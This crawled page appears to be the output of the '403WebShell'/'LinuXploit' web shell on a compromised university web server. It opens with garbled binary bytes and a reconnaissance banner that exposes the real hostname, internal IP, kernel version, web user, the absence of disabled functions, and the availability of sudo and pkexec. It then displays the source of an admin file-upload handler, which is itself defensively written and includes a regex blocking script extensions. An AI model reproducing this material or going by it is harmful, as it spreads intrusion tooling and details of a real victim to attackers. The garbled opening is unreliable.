h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/arit/procurement/pages/admin/


Current File : /var/www/html/arit/procurement/pages/admin/file_add_db.php
<?ob_start();?>
<?php include 'check_mode_admin.php';?>
<?php include '../dbconnect.php';?>
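<?php
/*
 * Admin handler: attaches an uploaded file to a procurement record.
 *
 * Flow: validate the POSTed procurement id and the uploaded file name,
 * compute the next file_order for that procurement, insert a row into
 * procurement_file, move the upload into ../file/<procurement_id>/ and
 * redirect back to procurement_detail.php.
 *
 * Every value read from $_POST and $_FILES is attacker-controlled, so:
 *   - procurement_id must be a positive integer before it is used in SQL
 *     or in a filesystem path;
 *   - all SQL goes through prepared statements;
 *   - the client-supplied file name is reduced to a bare name and checked
 *     against an extension allowlist before anything is written under the
 *     web root;
 *   - query-string values in the redirect are URL-encoded.
 *
 * NOTE(review): access control presumably comes from check_mode_admin.php,
 * included above this block; confirm that it stops the request for
 * non-admins. No CSRF token check is visible in this block.
 * NOTE(review): the upload directory sits under the web root. The web
 * server should be configured not to execute scripts from ../file/.
 */

// Extensions accepted for procurement attachments. Adjust this list to the
// document types the site really needs; keep it an allowlist.
$allowed_extensions = array(
	"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
	"zip", "rar", "jpg", "jpeg", "png", "gif",
);

if (!empty($_POST["submit"]))
{
  if (isset($_FILES["file_name"]["name"]) && is_string($_FILES["file_name"]["name"]) && $_FILES["file_name"]["name"])
  {
	$procurement_id = (isset($_POST["procurement_id"]) && is_string($_POST["procurement_id"]))
		? trim($_POST["procurement_id"]) : "";

	// Digits only, bounded length, and non-zero: the value is used both as
	// an integer SQL parameter and as a directory name.
	if (ctype_digit($procurement_id) && strlen($procurement_id) <= 9 && (int)$procurement_id > 0)
	{
		$procurement_id = (int)$procurement_id;
		$file_title = (isset($_POST["file_title"]) && is_string($_POST["file_title"])) ? $_POST["file_title"] : "";
		$strKeyword = (isset($_POST["txtKeyword"]) && is_string($_POST["txtKeyword"])) ? $_POST["txtKeyword"] : "";
		$page = (isset($_POST["Page"]) && is_string($_POST["Page"])) ? $_POST["Page"] : "";

		// Reduce the client-supplied name to its last path component by hand
		// (basename() is locale-dependent for multibyte names) and drop
		// control characters.
		$file_path = str_replace("\\", "/", $_FILES["file_name"]["name"]);
		$last_slash = strrpos($file_path, "/");
		if ($last_slash !== false)
		{
			$file_path = substr($file_path, $last_slash + 1);
		}
		$file_path = preg_replace('/[\x00-\x1F\x7F]/', '', $file_path);

		// The final extension must be allowlisted. No dot-file names, and no
		// script-like extension hidden in the middle ("name.php.jpg").
		$segments = explode(".", strtolower($file_path));
		$extension = (count($segments) > 1) ? $segments[count($segments) - 1] : "";
		$name_ok = ($file_path !== "" && $file_path[0] !== "." && in_array($extension, $allowed_extensions, true));
		for ($i = 1; $name_ok && $i < count($segments) - 1; $i++)
		{
			if (preg_match('/^(php\d*|phtml|pht|phar|cgi|pl|py|sh|asp|aspx|jsp)$/', $segments[$i]))
			{
				$name_ok = false;
			}
		}

		$upload_error = isset($_FILES["file_name"]["error"]) ? $_FILES["file_name"]["error"] : UPLOAD_ERR_NO_FILE;

		if ($upload_error !== UPLOAD_ERR_OK)
		{
			// Upload failed before reaching this script (size limit, partial upload, ...).
			echo "ไม่สามารถบันทึกไฟล์ได้<BR>";
		}
		elseif (!$name_ok)
		{
			// Rejected before touching the database so no orphan row is created.
			echo "ไม่อนุญาตให้อัปโหลดไฟล์ประเภทนี้<BR>";
		}
		else
		{
			// Next position in the list: highest existing file_order + 1, or 1.
			$file_order = 1;
			$stmt = mysqli_prepare($conn, "SELECT file_order FROM procurement_file WHERE procurement_id = ? ORDER BY file_order DESC LIMIT 1");
			if ($stmt)
			{
				mysqli_stmt_bind_param($stmt, "i", $procurement_id);
				mysqli_stmt_execute($stmt);
				mysqli_stmt_bind_result($stmt, $last_order);
				if (mysqli_stmt_fetch($stmt))
				{
					$file_order = (int)$last_order + 1;
				}
				mysqli_stmt_close($stmt);
			}

			// Parameterized insert; file_title and file_name are bound as data.
			$query = false;
			$stmt = mysqli_prepare($conn, "INSERT INTO procurement_file (file_title,file_name,procurement_id,file_order) VALUES (?,?,?,?)");
			if ($stmt)
			{
				mysqli_stmt_bind_param($stmt, "ssii", $file_title, $file_path, $procurement_id, $file_order);
				$query = mysqli_stmt_execute($stmt);
				mysqli_stmt_close($stmt);
			}

			if($query)
			{
				// $procurement_id is an integer here, so the folder stays inside ../file/.
				$image_folder = "../file/" . $procurement_id ;
				if (!(file_exists($image_folder)))
				{
					mkdir($image_folder , 0755);
				}
				//upload file
				// The stored name is the sanitized one, matching the file_name column.
				if(move_uploaded_file($_FILES["file_name"]["tmp_name"], $image_folder . "/" . $file_path))
				{
					echo "บันทึกไฟล์เรียบร้อยแล้ว<BR>";
				}
				else
				{
					echo "ไม่สามารถบันทึกไฟล์ได้<BR>";
				}

				// URL-encode user-supplied values so they cannot add parameters
				// or break the Location header.
				$redirect_url = "procurement_detail.php?procurement_id=" . $procurement_id;
				if ($strKeyword<>"")
				{
					$redirect_url .= "&txtKeyword=" . urlencode($strKeyword);
				}
				if ($page<>"")
				{
					$redirect_url .= "&Page=" . urlencode($page);
				}
				header("location:$redirect_url");
				exit;
			}
			else
			{
				echo "ไม่สามารถบันทึกข้อมูลได้";
			}
		}

	}
	else
	{
		echo "ไม่พบรายการที่เลือก<BR>";
	}
  }  //if ($_FILES["file_name"]["name"])
  else //if ($_FILES["file_name"]["name"])
  {
  	echo "ไม่ได้เลือกไฟล์";
  }//if ($_FILES["file_name"]["name"])
} //if ($_POST["submit"])
?>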

Youez - 2016 - github.com/yon3zu
LinuXploit